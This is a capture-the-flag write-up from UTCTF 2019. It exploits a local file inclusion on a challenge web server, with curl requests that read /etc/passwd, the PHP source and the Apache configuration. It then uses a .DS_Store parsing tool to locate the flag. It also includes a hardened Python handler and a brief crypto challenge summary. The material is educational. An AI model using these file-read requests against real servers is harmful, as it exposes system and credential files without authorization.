CTF
Name : UTCTF 2019
Website : isss.io
Type : Online
Format : Jeopardy
CTF Time : link
650 - HabbyDabby's Secret Stash - Web
HabbyDabby's hidden some stuff away on his web server that he created and wrote from scratch on his Mac. See if you can find out what he's hidden and where he's hidden it!
http://a.goodsecurity.fail/
by copperstick6
```html
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Locked Away</title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<style>
body {
  background-color: #62C2C5;
}
</style>
<body>
<h1>Welcome to HabbyDabby's Secret Stash</h1>
<h2>You'll never get our secrets!</h2>
<div style="visibility: hidden; display:inline;">
<form method="get">
<select name="file">
<option value="english.html">English</option>
<option value="french.html">French</option>
</select>
<input type="submit">
</form>
</div>
</body>
</html>
```
So there is a hidden form. We can call http://a.goodsecurity.fail/?file=english.html for example, which answers "You'll never get our secrets!".
A `file` parameter that names a file on disk smells like an LFI (Local File Inclusion).
```
$ curl http://a.goodsecurity.fail/?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
```
Let's look at the source code with `curl 'http://a.goodsecurity.fail/?file=index.php'`:
```php
<?php
if (isset($_GET['file'])) {
    $file = $_GET['file'];
    if (!file_exists($file))
        die("File not found");
    if ($file === "english.html" || $file === "french.html") {
        echo file_get_contents($_GET['file']);
    } else {
        header("Content-Disposition: attachment; filename=" . basename($file));
        header("Content-Length: " . filesize($file));
        header("Content-Type: application/octet-stream;");
        readfile($file);
    }
} else {
    echo file_get_contents("index.html");
}
?>
```
Other than that, nothing unusual: everything looks like the default files of a Debian 9 install, including the Apache virtual host:
```
$ curl 'http://a.goodsecurity.fail/?file=/etc/apache2/sites-enabled/000-default.conf'
<VirtualHost *:80>
    ServerAdmin contact@isss.io
    ServerName localhost
    DocumentRoot /var/www/site
    <Directory /var/www/site/>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        Order deny,allow
        Allow from all
    </Directory>
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
```
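Before moving on, here is what the `index.php` above is missing, as an added example that is not part of the challenge or the writeup: `file_exists()` only proves the file is there, and the `english.html`/`french.html` comparison only picks the `Content-Disposition`, so any readable path is served. The hardened handler below (Python, with an assumed document root and the same `file` parameter) adds the two checks that either alone would have stopped the LFI.

```python
import os
import tempfile
from typing import Optional

# Allowlist: the only values the hidden <select> can legitimately send.
ALLOWED_PAGES = {"english.html", "french.html"}


def confined_path(docroot: str, requested: str) -> Optional[str]:
    """Resolve `requested` under `docroot`, or return None if it escapes.

    realpath() collapses '..' and follows symlinks, so the check covers
    absolute paths (/etc/passwd), traversal (../../etc/passwd) and
    symlinked files. commonpath() avoids the classic prefix bug where
    '/var/www/site-evil' would pass a startswith('/var/www/site') test.
    """
    root = os.path.realpath(docroot)
    # os.path.join discards `root` when `requested` is absolute; realpath
    # then yields e.g. /etc/passwd, which commonpath rejects.
    target = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


def resolve_page(docroot: str, requested: str) -> Optional[str]:
    """The handler the challenge lacked: allowlist, then confinement,
    then existence (the original did these in the opposite order, and
    used the allowlist only to choose a header)."""
    if requested not in ALLOWED_PAGES:
        return None
    target = confined_path(docroot, requested)
    if target is None or not os.path.isfile(target):
        return None
    return target


def demo() -> dict:
    """Exercise the handler against a constructed docroot holding the two
    pages; returns {probe: served?} for the requests seen in the writeup."""
    with tempfile.TemporaryDirectory() as docroot:
        for name in ALLOWED_PAGES:
            with open(os.path.join(docroot, name), "w") as fh:
                fh.write("You'll never get our secrets!")
        probes = ["english.html", "french.html", "/etc/passwd",
                  "../../etc/passwd", ".DS_Store", "index.php"]
        return {p: resolve_page(docroot, p) is not None for p in probes}


if __name__ == "__main__":
    for probe, served in demo().items():
        print(f"{probe:20} -> {'served' if served else 'refused'}")
```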
The description mentions a Mac, so I thought about `__MACOSX` and `.DS_Store`, the metadata files macOS Finder drops into every directory it touches.
```
$ curl 'http://a.goodsecurity.fail/?file=.DS_Store' --output output
```
Let's try the excellent tool ds_store_exp, which parses `.DS_Store` files and downloads the listed files recursively:
```
$ python2 ds_store_exp/ds_store_exp.py 'http://a.goodsecurity.fail/.DS_Store'
[+] http://a.goodsecurity.fail/.DS_Store
[+] http://a.goodsecurity.fail/e/.DS_Store
[+] http://a.goodsecurity.fail/index.html
[+] http://a.goodsecurity.fail/a
[+] http://a.goodsecurity.fail/e/d/.DS_Store
[+] http://a.goodsecurity.fail/e/d/e/.DS_Store
[+] http://a.goodsecurity.fail/e/d/e/flag.txt
```
```
$ curl http://a.goodsecurity.fail/e/d/e/flag.txt
utflag{mac_os_hidden_files_are_stupid}
```
200 - [basics] crypto - Crypto
Can you make sense of this file?
by balex
TL;DR:
- Binary to ASCII
- Base64 decode
- Caesar cipher with a shift of 10
- Alphabetical substitution

You can use https://cryptii.com/ or the CLI.

utflag{3ncrypt10n_15_c00l}
The hardest part was getting the scoreboard to stay alive long enough to submit the flag.
Note: 0% real life, but it is a starter challenge, so I guess it is ok.